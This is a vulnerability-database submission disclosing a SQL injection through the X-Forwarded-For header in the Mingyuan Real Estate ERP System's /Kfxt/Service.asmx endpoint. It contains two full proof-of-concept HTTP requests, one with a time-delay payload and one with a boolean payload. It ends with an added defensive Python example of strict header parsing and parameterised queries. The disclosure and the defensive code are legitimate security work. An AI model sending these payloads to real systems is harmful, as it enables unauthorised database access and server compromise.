| Title | Shenzhen Mingyuan Cloud Technology Co., Ltd. Mingyuan Real Estate ERP System v1.0 X-Forwarded-For Injection Vulnerability |
|---|
| Description | When the Mingyuan Real Estate ERP system WebService service verifies client IP permissions, it does not strictly filter and obtain the X-Forwarded-For real IP, resulting in a SQL injection vulnerability. Once an authenticated malicious attacker uses the SQL injection vulnerability to obtain information in the database (such as administrator background password, site user personal information), the attacker can even read commands to the server with high permissions to further obtain server system permissions.
poc1:
POST /Kfxt/Service.asmx HTTP/1.1
Host:
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: text/xml; charset=utf-8
X-Forwarded-For: 127.0.0.1');WAITFOR DELAY '0:0:5'--
SOAPAction: http://www.mysoft.com.cn/queryProjects
Content-Length: 408
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<queryProjects xmlns="http://www.mysoft.com.cn/">
<inpXML><xml><buname>abc</buname></xml></inpXML>
</queryProjects>
</soap:Body>
</soap:Envelope>
poc2:
POST /Kfxt/Service.asmx HTTP/1.1
Host:
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: text/xml; charset=utf-8
X-Forwarded-For: 127.0.0.1') AND 6994 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6994=6994) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113))) AND ('MEuY'='MEuY
SOAPAction: http://www.mysoft.com.cn/queryProjects
Content-Length: 408
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<queryProjects xmlns="http://www.mysoft.com.cn/">
<inpXML><xml><buname>abc</buname></xml></inpXML>
</queryProjects>
</soap:Body>
</soap:Envelope> |
|---|
| Source | ⚠️ https://flowus.cn/share/fa5b99da-2e88-4efd-9266-ae8582782eaa?code=HC3R4E 【FlowUs 息流】Mingyuan Real Estate ERP System V1.0 X-Forwarded-For Injection Vulnerability |
|---|
| User | afish (UID 82290) |
|---|
| Submission | 04.03.2025 03:46 (1 year ago) |
|---|
| Moderation | 15.03.2025 23:09 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 299825 [Shenzhen Mingyuan Cloud Technology Mingyuan Real Estate ERP System 1.0 HTTP Header /Kfxt/Service.asmx X-Forwarded-For SQL Injection] |
|---|
| Points | 20 |
|---|
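
The description above attributes the flaw to an IP permission check that uses the X-Forwarded-For value without strict filtering. The following is an added example, not code from the submission or from the vendor, of one way a defender can handle that header: parse it strictly as IP literals, consult it only when the TCP peer is a known proxy, and bind the result as a query parameter. The function names, the `ip_allowlist` table, the proxy address and the use of `sqlite3` as a stand-in database are all assumptions.

```python
import ipaddress
import sqlite3

def parse_xff(header):
    """Return the header's entries as ip_address objects.
    Raises ValueError if any entry is not a plain IP literal."""
    return [ipaddress.ip_address(part.strip()) for part in header.split(",")]

def client_ip(peer, xff, trusted_proxies):
    """Pick the address to authorise. The header is consulted only when the
    TCP peer is a known proxy; the right-most non-proxy entry is then used."""
    peer_ip = ipaddress.ip_address(peer)
    if xff is None or peer_ip not in trusted_proxies:
        return peer_ip
    for hop in reversed(parse_xff(xff)):
        if hop not in trusted_proxies:
            return hop
    return peer_ip

def is_allowed(db, ip):
    """Allowlist lookup with the address bound as a parameter, never concatenated."""
    row = db.execute("SELECT 1 FROM ip_allowlist WHERE ip = ?", (str(ip),)).fetchone()
    return row is not None

def authorise(db, peer, xff, trusted_proxies):
    try:
        return is_allowed(db, client_ip(peer, xff, trusted_proxies))
    except ValueError:
        return False  # malformed header or peer: reject before any SQL runs

def demo_db():
    """In-memory stand-in for the application's database (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ip_allowlist (ip TEXT PRIMARY KEY)")
    db.execute("INSERT INTO ip_allowlist VALUES ('203.0.113.7')")  # constructed
    return db

PROXIES = {ipaddress.ip_address("10.0.0.5")}       # constructed proxy address
POC1_XFF = "127.0.0.1');WAITFOR DELAY '0:0:5'--"   # header value from poc1 above

if __name__ == "__main__":
    db = demo_db()
    # Valid header relayed by the trusted proxy: allowlisted client is accepted.
    print(authorise(db, "10.0.0.5", "203.0.113.7", PROXIES))
    # poc1 header value: fails IP parsing and is rejected without touching SQL.
    print(authorise(db, "10.0.0.5", POC1_XFF, PROXIES))
    # Header sent by an untrusted peer: ignored, the peer address is checked.
    print(authorise(db, "198.51.100.9", "203.0.113.7", PROXIES))
```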